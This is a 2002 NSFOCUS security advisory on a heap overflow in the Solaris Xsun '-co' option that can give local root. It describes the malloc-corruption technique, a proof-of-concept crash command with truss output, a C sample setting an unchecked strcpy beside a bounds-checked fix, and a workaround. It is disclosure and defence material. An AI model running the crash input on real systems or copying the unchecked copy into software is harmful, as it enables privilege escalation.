永远的FLASH
Sun Solaris Xsun "-co" heap overflow

NSFOCUS Security Advisory (SA2002-01)

Topic: Sun Solaris Xsun "-co" heap overflow
Release Date: 2002-4-02
CVE CAN ID: CAN-2002-0158
Affected system:
================
- Sun Solaris 2.6 (SPARC/x86)
- Sun Solaris 7 (SPARC/x86)
- Sun Solaris 8 (SPARC/x86)
Impact:
=======
NSFOCUS Security Team has found a buffer overflow vulnerability in the Xsun shipped with Solaris systems. When Xsun processes the command line parameter "-co", a local attacker could exploit the flaw to run arbitrary code with root user/root group privilege.
Description:
============
Xsun is the X Window server (for X11) on the Solaris platform. It is installed in /usr/openwin/bin/. On the SPARC platform it is installed with the setgid root attribute; on the x86 platform it is installed with the setuid root attribute.

Xsun supports a command line parameter "-co" that specifies the color database file. The application does not check the length of the filename supplied by the user, which an attacker could use to cause a heap overflow. With carefully constructed data, an attacker might be able to run arbitrary code with root privilege.

If the attacker provides an overlong filename (for example, longer than 6000 bytes) to "-co", it overflows a dynamically allocated buffer. By overwriting the boundary data structure of the next dynamic memory chunk, the attacker could abuse features of the malloc()/free() implementation to modify an arbitrary memory address (such as a saved return address or a function pointer).

On the SPARC platform the attacker could obtain root group privilege; on the x86 platform the attacker could obtain root user privilege.
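To make the flaw described above concrete, here is an added example in C. It is not NSFOCUS's, Sun's or Xsun's code: a hypothetical unchecked copy of the "-co" argument into a fixed-size heap buffer sits beside a length-checked version, and RGB_PATH_MAX, the function names and the sample path are assumptions. The unchecked copy is kept only for contrast and is never called with the 6000-byte argument.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for the colour database path (not Xsun's real value). */
#define RGB_PATH_MAX 256

/* Vulnerable pattern: the "-co" argument is copied into a fixed-size heap
 * buffer with no length check; an over-long argument overruns into the next chunk. */
char *rgb_path_unchecked(const char *arg)
{
    char *buf = malloc(RGB_PATH_MAX);
    if (buf == NULL) return NULL;
    strcpy(buf, arg);                   /* BUG: no bound on strlen(arg) */
    return buf;
}

/* Hardened version: refuse anything that would not fit, then size the
 * allocation to the input and copy with an explicit bound. */
char *rgb_path_checked(const char *arg)
{
    size_t len = strlen(arg);           /* argv strings are NUL-terminated */
    if (len >= RGB_PATH_MAX) return NULL;   /* no room for the terminator */
    char *buf = malloc(len + 1);
    if (buf == NULL) return NULL;
    memcpy(buf, arg, len + 1);
    return buf;
}

/* Builds the advisory's over-long argument (perl -e 'print "A"x6000'). */
char *make_long_arg(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL) return NULL;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char *arg = make_long_arg(6000);
    char *ok = rgb_path_checked("sample/rgb.txt");   /* constructed path */
    char *bad = rgb_path_checked(arg);               /* NULL: rejected */
    printf("short path: %s\n6000-byte path: %s\n",
           ok ? ok : "(rejected)", bad ? bad : "(rejected)");
    free(arg); free(ok); free(bad);
    return 0;
}
```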
Exploit:
========
[root@ /tmp]> uname -a
SunOS sun8 5.8 Generic sun4u sparc SUNW,Ultra-5_10
[root@ /tmp]> truss /usr/openwin/bin/Xsun :1 -co `perl -e 'print "A"x6000'`
.....
mmap(0x00000000, 8404992, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_NORESERVE, 4, 0) = 0xFE400000
mprotect(0xFE400000, 8192, PROT_NONE) = 0
mprotect(0xFEC02000, 8192, PROT_NONE) = 0
open64("A...AAAAA", O_RDONLY) Err#78 ENAMETOOLONG
Couldn't open RGB_DB 'write(2, " C o u l d n ' t   o p e".., 22) = 22
AAA...AAAAAAAAAAAAAAAAAAAAAAAAAAwrite(2, " A A A A A A A A A A A A".., 6000) = 6000
'write(2, " '\n", 2) = 2
getpid() = 21677 [21676]
getrlimit(RLIMIT_NOFILE, 0xFFBEE3F8) = 0
setrlimit(RLIMIT_NOFILE, 0xFFBEE3F8) = 0
uname(0xFFBEDB30) = 1
getrlimit(RLIMIT_NOFILE, 0xFFBEE128) = 0
so_socket(2, 2, 0, "", 1) = 0
setsockopt(0, 6, 1, 0xFFBEE124, 4, 1) = 0
setsockopt(0, 65535, 8, 0xFFBEE120, 4, 1) = 0
setsockopt(0, 65535, 4, 0xFFBEE194, 4, 1) = 0
bind(0, 0xFFBEE1B8, 16, 3) = 0
setsockopt(0, 65535, 128, 0x00175D40, 8, 1) = 0
listen(0, 5, 1) = 0
getsockname(0, 0xFFBEE144, 0xFFBEE154, 1) = 0
uname(0xFFBEDB30) = 1
    Incurred fault #5, FLTACCESS  %pc = 0xFECC14C8
      siginfo: SIGBUS BUS_ADRALN addr=0x41414141
    Received signal #10, SIGBUS [default]
      siginfo: SIGBUS BUS_ADRALN addr=0x41414141
    *** process killed ***
Workaround:
===========
Temporarily remove the suid root or sgid root attribute of Xsun:

# chmod a-s /usr/openwin/bin/Xsun
Vendor Status:
==============
2001.8.08  We have informed Sun of this problem.
2001.8.08  Sun replied that they have forwarded the problem to the corresponding team, but there has been no further response up to now.

In our testing, Xsun with the latest security patch still has the problem.
Additional Information:
========================
The Common Vulnerabilities and
Exposures (CVE) project has assigned the name CAN-2002-0158 to
this issue. This is a candidate for inclusion in the CVE list
(http://cve.mitre.org), which standardizes names for security
problems. Candidates may change significantly before they become
official CVE entries.
DISCLAIMS:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2002 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)